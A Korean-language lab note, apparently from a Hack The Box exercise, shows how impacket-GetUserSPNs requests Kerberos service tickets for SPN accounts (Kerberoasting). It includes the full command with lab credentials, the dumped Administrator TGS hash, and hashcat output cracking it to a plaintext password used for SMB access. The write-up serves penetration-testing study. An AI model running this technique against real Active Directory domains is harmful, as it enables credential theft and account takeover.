GetUserSPNs

1. 개요

AD 환경에서 서비스 계정(svc_XXX)들의 암호 해시를 합법적으로 가져오는 도구이다. 여기서 SPN이란 Service Principal Name의 약자로 서비스 계정을 의미하는 단어이다.

해당 툴은 AD 안에 있는 사용자 계정 중에서 SPN 이라는 속성이 설정된 계정을 찾아낸다. 그리고 찾아낸 계정들에 대해 TGS를 달라고 DC에 요청을 한다.

2. 사용법

2.1. 기본 사용법

아래와 같은 명령어를 사용하면 GetUserSPNs.out 파일이 만들어 진다.

Copy┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# impacket-GetUserSPNs -request -dc-ip 10.129.48.114 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 23:06:40.351723  2025-12-29 10:03:46.278540             



[-] CCache file is not found. Skipping...
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache  GetUserSPNs.out  Groups.xml

해당 파일 안에 우리가 원하는 암호 해시가 존재한다.

Copy                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat GetUserSPNs.out    
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$f80bf71ffcb231160eeda80b5dd98fdd05e52ad00b30f55a686d9c15043b5664d5e76dd910f7e3da2e85aa5c55a7b79c5a37b6e66e5ae2db72fb5f42e54dbb2e2100d5d25e2ea83046d6ba0a60b58bee3a65c023e59e5d524c925f50ab2e72a7d146183428353c63f8b6c2a0e18858d5b65f0c481df296383881f3eb3a3088ebeea4e1ae8100c6121e00d5f682c0a4d563b22ec6c06abbed595d74ed175fb026ece5486d73d43fd0e0282718a0685ffa13c3c82235c1a0cc76de28b207ac7b8c617757d3557aaf0fc065e54efe288e6dc66cd4652cc88f151554e5db455b3ced011dc3604b7c6ad53e02bca02ec131161e053a26dab6fd989d36d2de7217a6955decc6f141360d0f752d9f1315716865f8cc56ac2339f7d90285d413e2f2e3effe746648783e1d6868188354a80f72e65a29c34f6988a463ff84d3cf682ef212bd458f54968a309130a8b9a08ec0a3227795a49b8e2535d55965c7170d2497d9c92469ced1957d76dc87ab0f9a3152c5ed6211db93b01aef290012417d8315d4089d2b305cfe4998038ed33843b7dadaf11780873de4e9f8e1c9fb0fa06867cc010214eedeb4d635b5ba9a393855fd7e883e5bce0eeb21f75c4886e973d1be26f620010d12c55fe447e64d856c29562946af90b2f9d163e22246c5eed05ade5a8946295556b589e2546a32bfc862dcf8f3483e1ab38eb49d4f95c90bc2cb058bd4be332ad140f88fedc3a1ed7a43d117622f540a34dc2aff9b3d4496dd652f5963c564f72e896b770bcc6501e7636b44bdc205b61a78a1ba8022e75db4135655f98e89bc912dae7c47e753eab8644886554b654b829cf3e7093954358a11757d58a0074128c677a17d6b64155fb8090f8edfc85fb03028b6f28bf7e0536c0fa228d9e7d9d887a4548ed8ab853508d1c7076cd90dd8fdb6db8d45a981bb9245bb9b226c98f7bc9dd56259e4a1c518d2d8ad70116ba530139b93ea8470d0b4173455638824765cd7476b0d311561584199caca2d72c90c976a3205f4a1eabe21770090a0a14ae3afcc95667543e9dc235531cac7ebcb0623c19ff334bb535a2ce7d220d3234669c4f2f0d16d14980354cc1b1e58a033b243b7c298e255c49992554c9097b1e204955b4c7f00349faaaf4da8d3d53e4790b05c8109e7ad78c4d18ed388cd485a96aad241005b1cfab8d6608abedbef4c59ee0473a924c7c965d65b0

그리고 해당 해시는 hashcat 의 13100 번 모듈을 통해서 해제할 수 있다.

Copy┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

[...SNIP...]

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$f80bf71ffcb231160eeda80b5dd98fdd05e52ad00b30f55a686d9c15043b5664d5e76dd910f7e3da2e85aa5c55a7b79c5a37b6e66e5ae2db72fb5f42e54dbb2e2100d5d25e2ea83046d6ba0a60b58bee3a65c023e59e5d524c925f50ab2e72a7d146183428353c63f8b6c2a0e18858d5b65f0c481df296383881f3eb3a3088ebeea4e1ae8100c6121e00d5f682c0a4d563b22ec6c06abbed595d74ed175fb026ece5486d73d43fd0e0282718a0685ffa13c3c82235c1a0cc76de28b207ac7b8c617757d3557aaf0fc065e54efe288e6dc66cd4652cc88f151554e5db455b3ced011dc3604b7c6ad53e02bca02ec131161e053a26dab6fd989d36d2de7217a6955decc6f141360d0f752d9f1315716865f8cc56ac2339f7d90285d413e2f2e3effe746648783e1d6868188354a80f72e65a29c34f6988a463ff84d3cf682ef212bd458f54968a309130a8b9a08ec0a3227795a49b8e2535d55965c7170d2497d9c92469ced1957d76dc87ab0f9a3152c5ed6211db93b01aef290012417d8315d4089d2b305cfe4998038ed33843b7dadaf11780873de4e9f8e1c9fb0fa06867cc010214eedeb4d635b5ba9a393855fd7e883e5bce0eeb21f75c4886e973d1be26f620010d12c55fe447e64d856c29562946af90b2f9d163e22246c5eed05ade5a8946295556b589e2546a32bfc862dcf8f3483e1ab38eb49d4f95c90bc2cb058bd4be332ad140f88fedc3a1ed7a43d117622f540a34dc2aff9b3d4496dd652f5963c564f72e896b770bcc6501e7636b44bdc205b61a78a1ba8022e75db4135655f98e89bc912dae7c47e753eab8644886554b654b829cf3e7093954358a11757d58a0074128c677a17d6b64155fb8090f8edfc85fb03028b6f28bf7e0536c0fa228d9e7d9d887a4548ed8ab853508d1c7076cd90dd8fdb6db8d45a981bb9245bb9b226c98f7bc9dd56259e4a1c518d2d8ad70116ba530139b93ea8470d0b4173455638824765cd7476b0d311561584199caca2d72c90c976a3205f4a1eabe21770090a0a14ae3afcc95667543e9dc235531cac7ebcb0623c19ff334bb535a2ce7d220d3234669c4f2f0d16d14980354cc1b1e58a033b243b7c298e255c49992554c9097b1e204955b4c7f00349faaaf4da8d3d53e4790b05c8109e7ad78c4d18ed388cd485a96aad241005b1cfab8d6608abedbef4c59ee0473a924c7c965d65b088f01b9e07ab1181ead7020eae0b38c41aff4ea1d9b94e153e9:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...e153e9
Time.Started.....: Mon Dec 29 11:10:17 2025 (3 secs)
Time.Estimated...: Mon Dec 29 11:10:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3089.2 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 78%

Started: Mon Dec 29 11:10:16 2025
Stopped: Mon Dec 29 11:10:22 2025

위 과정을 거치면 평문으로 된 비밀번호를 통해 smb 등의 서비스에 접근할 수 있게 된다.